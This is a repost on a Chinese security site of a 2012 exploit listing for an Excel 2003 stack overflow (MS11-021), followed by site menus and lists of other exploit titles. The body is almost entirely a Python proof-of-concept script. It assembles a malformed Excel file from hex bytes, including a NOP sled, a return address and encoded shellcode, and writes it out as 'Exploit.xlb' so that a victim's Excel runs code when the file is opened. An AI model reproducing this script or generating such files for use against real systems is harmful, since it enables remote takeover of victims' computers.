首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Office Excel 2003 Stack Overflow
来源:Senator.of.Pirates.team[at]gmail.com 作者:Senator 发布时间:2012-10-10  
# Title : Microsoft Office Excel Stack Overflow
# Auther : Senator of Pirates (Khalil Zhani)
# FaceBook : /SenatorofPiratesInfo
# E-Mail : Senator.of.Pirates.team[at]gmail.com
# Greeting : Special thanks to my best friend Mr. Marshal Webb 
# Tested : on windowns XP SP3(EN) with Microsoft Office Excel 2003

A remote code execution vulnerability exists in the way that Microsoft Excel handles specially
crafted Excel files. An attacker who successfully exploited this vulnerability could take complete control
of an affected system. This is the same vulnerability that is referenced in MS11-021. Proof of concept exploit code included.

PoC =("\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x3E\x00\x03\x00\xFE\xFF\x09\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x22\x00\x00\x00\x01\x00\x00\x00\xFE\xFF\xFF\xFF"
"\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFD\xFF\xFF\xFF\x25\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00"
"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00\x09\x00\x00\x00\x0B\x00\x00\x00"
"\x0B\x00\x00\x00\x0C\x00\x00\x00\x0D\x00\x00\x00\x0E\x00\x00\x00\x0F\x00\x00\x00\x10\x00\x00\x00"
"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00\x15\x00\x00\x00\x16\x00\x00\x00"
"\x17\x00\x00\x00\x18\x00\x00\x00\x19\x00\x00\x00\x1A\x00\x00\x00\x1B\x00\x00\x00\x1C\x00\x00\x00"
"\x1D\x00\x00\x00\x1E\x00\x00\x00\x1F\x00\x00\x00\x20\x00\x00\x00\x21\x00\x00\x00\xFE\xFF\xFF\xFF"
"\xFE\xFF\xFF\xFF\x24\x00\x00\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x52\x00\x6F\x00\x6F\x00\x74\x00"
"\x02\x00\x45\x00\x6E\x00\x74\x00\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x08\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x02\x00\x00\x00"
"\x20\x08\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x50\x42\x86\x2A\xFB\x9F\xCA\x01\x23\x00\x00\x00\xC0\x02\x00\x00\x00\x00\x00\x00"
"\x57\x00\x6F\x00\x72\x00\x6B\x00\x62\x00\x6F\x00\x6F\x00\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x02\x01\x04\x00\x00\x00"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
"\x7A\x3F\x00\x00\x00\x00\x00\x00\x09\x00\x53\x00\x75\x00\x6D\x00\x6D\x00\x61\x00\x72\x00\x79\x00"
"\x49\x00\x6E\x00\x66\x00\x6F\x00\x72\x00\x6D\x00\x61\x00\x74\x00\x69\x00\x6F\x00\x6E\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x28\x00\x02\x01\x01\x00\x00\x00\x03\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xD0\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x44\x00\x6F\x00\x63\x00"
"\x75\x00\x6D\x00\x65\x00\x6E\x00\x74\x00\x53\x00\x75\x00\x6D\x00\x6D\x00\x61\x00\x72\x00\x79\x00"
"\x49\x00\x6E\x00\x66\x00\x6F\x00\x72\x00\x6D\x00\x61\x00\x74\x00\x69\x00\x6F\x00\x6E\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x38\x00\x02\x01\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00"
"\x09\x08\x10\x00\x00\x06\x00\x04\xAA\x1F\xCD\x07\xC9\x00\x05\x00\x06\x04\x00\x00")
# fields
PoC +=("\xA7\x00\x04\x00\xB0\x0F\x0C\x00\x3C\x00\x00\x03")
# Data + Nops + Shellcode
PoC +=("\x40\xDF\xD6\xD5\x3B\xDF\xD6\xD5\x3B\x00\x00\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xD7\x71\x10\x30\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x50\xFF\x61\x31\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xB8\x20\x65\x02\x44\xDB\xC2\xD9"
"\x74\x24\xF4\x5A\x33\xC9\xB1\x32\x31\x42\x12\x03\x42\x12\x83\xCA\x99\xE0\xB1\xF6\x8A\x6C\x39\x06"
"\x4B\x0F\xB3\xE3\x7A\x1D\xA7\x60\x2E\x91\xA3\x24\xC3\x5A\xE1\xDC\x50\x2E\x2E\xD3\xD1\x85\x08\xDA"
"\xE2\x2B\x95\xB0\x21\x2D\x69\xCA\x75\x8D\x50\x05\x88\xCC\x95\x7B\x63\x9C\x4E\xF0\xD6\x31\xFA\x44"
"\xEB\x30\x2C\xC3\x53\x4B\x49\x13\x27\xE1\x50\x43\x98\x7E\x1A\x7B\x92\xD9\xBB\x7A\x77\x3A\x87\x35"
"\xFC\x89\x73\xC4\xD4\xC3\x7C\xF7\x18\x8F\x42\x38\x95\xD1\x83\xFE\x46\xA4\xFF\xFD\xFB\xBF\x3B\x7C"
"\x20\x35\xDE\x26\xA3\xED\x3A\xD7\x60\x6B\xC8\xDB\xCD\xFF\x96\xFF\xD0\x2C\xAD\xFB\x59\xD3\x62\x8A"
"\x1A\xF0\xA6\xD7\xF9\x99\xFF\xBD\xAC\xA6\xE0\x19\x10\x03\x6A\x8B\x45\x35\x31\xC1\x98\xB7\x4F\xAC"
"\x9B\xC7\x4F\x9E\xF3\xF6\xC4\x71\x83\x06\x0F\x36\x7B\x4D\x12\x1E\x14\x08\xC6\x23\x79\xAB\x3C\x67"
"\x84\x28\xB5\x17\x73\x30\xBC\x12\x3F\xF6\x2C\x6E\x50\x93\x52\xDD\x51\xB6\x30\x80\xC1\x5A\xB7\x41"
"\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\x04\x01\x01\x00"
"\x38\x00\xBC\x02\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00"
"\x69\x00\x31\x00\x1E\x00\xDC\x00\x01\x00\x38\x00\xBC\x02\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00"
"\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x00\x00\x11\x00\x90\x01"
"\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00"
"\x1E\x00\xDC\x00\x00\x00\x14\x00\x90\x01\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00"
"\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x00\x00\x3C\x00\x90\x01\x00\x00\x00\x02"
"\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00"
"\x00\x00\x3E\x00\x90\x01\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00"
"\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x01\x00\x3F\x00\xBC\x02\x00\x00\x00\x02\x00\xFA\x07\x01"
"\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x01\x00\x34\x00"
"\xBC\x02\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00"
"\x31\x00\x1E\x00\xDC\x00\x00\x00\x34\x00\x90\x01\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00"
"\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x01\x00\x09\x00\xBC\x02\x00\x00"
"\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00"
"\xDC\x00\x00\x00\x0B\x00\x90\x01\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00"
"\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x02\x00\x17\x00\x90\x01\x00\x00\x00\x02\x00\xFA"
"\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x01\x00"
"\x08\x00\xBC\x02\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00"
"\x69\x00\x31\x00\x1E\x00\xDC\x00\x00\x00\x09\x00\x90\x01\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00"
"\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x1E\x04\x1C\x00\x05\x00\x17\x00\x00\x22\x24\x22"
"\x23\x2C\x23\x23\x30\x5F\x29\x3B\x5C\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x5C\x29\x1E\x04\x21\x00"
"\x06\x00\x1C\x00\x00\x22\x24\x22\x23\x2C\x23\x23\x30\x5F\x29\x3B\x5B\x52\x65\x64\x5D\x5C\x28\x22"
"\x24\x22\x23\x2C\x23\x23\x30\x5C\x29\x1E\x04\x22\x00\x07\x00\x1D\x00\x00\x22\x24\x22\x23\x2C\x23"
"\x23\x30\x2E\x30\x30\x5F\x29\x3B\x5C\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x2E\x30\x30\x5C\x29\x1E"
"\x04\x27\x00\x08\x00\x22\x00\x00\x22\x24\x22\x23\x2C\x23\x23\x30\x2E\x30\x30\x5F\x29\x3B\x5B\x52"
"\x65\x64\x5D\x5C\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x2E\x30\x30\x5C\x29\x1E\x04\x37\x00\x2A\x00"
"\x32\x00\x00\x5F\x28\x22\x24\x22\x2A\x20\x23\x2C\x23\x23\x30\x5F\x29\x3B\x5F\x28\x22\x24\x22\x2A"
"\x20\x5C\x28\x23\x2C\x23\x23\x30\x5C\x29\x3B\x5F\x28\x22\x24\x22\x2A\x20\x22\x2D\x22\x5F\x29\x3B"
"\x5F\x28\x40\x5F\x29\x1E\x04\x2E\x00\x29\x00\x29\x00\x00\x5F\x28\x2A\x20\x23\x2C\x23\x23\x30\x5F"
"\x29\x3B\x5F\x28\x2A\x20\x5C\x28\x23\x2C\x23\x23\x30\x5C\x29\x3B\x5F\x28\x2A\x20\x22\x2D\x22\x5F"
"\x29\x3B\x5F\x28\x40\x5F\x29\x1E\x04\x3F\x00\x2C\x00\x3A\x00\x00\x5F\x28\x22\x24\x22\x2A\x20\x23"
"\x2C\x23\x23\x30\x2E\x30\x30\x5F\x29\x3B\x5F\x28\x22\x24\x22\x2A\x20\x5C\x28\x23\x2C\x23\x23\x30"
"\x2E\x30\x30\x5C\x29\x3B\x5F\x28\x22\x24\x22\x2A\x20\x22\x2D\x22\x3F\x3F\x5F\x29\x3B\x5F\x28\x40"
"\x5F\x29\x1E\x04\x36\x00\x2B\x00\x31\x00\x00\x5F\x28\x2A\x20\x23\x2C\x23\x23\x30\x2E\x30\x30\x5F"
"\x29\x3B\x5F\x28\x2A\x20\x5C\x28\x23\x2C\x23\x23\x30\x2E\x30\x30\x5C\x29\x3B\x5F\x28\x2A\x20\x22"
"\x2D\x22\x3F\x3F\x5F\x29\x3B\x5F\x28\x40\x5F\x29\xE0\x00\x14\x00\x00\x00\x00\x00\xF5\xFF\x20\x00")
 
 
try:
    A = open("Exploit.xlb","wb")   
    A.write(PoC)
    A.close()
    print "[*] The file created [*]"
except:
    print "[*] Error while creating file [*]"
 
print "[*] Enter to continue.. [*]"
raw_input()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows Escalate UAC Protectio
·Dart Communications Stack Over
·QNX QCONN Remote Command Execu
·Microsoft IIS 5.0/6.0 FTP Serv
·InduSoft Web Studio Arbitrary
·Hiro Player 1.6.0 (.mp3) Local
·NCMedia Sound Editor Pro 7.5.1
·Avaya WinPMD UniteHostRouter B
·MS11-080 AfdJoinLeaf Privilege
·Avaya IP Office Customer Call
·FastStone Image Viewer 4.6 <=
·PLIB 1.8.5 ssg/ssgParser.cxx B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved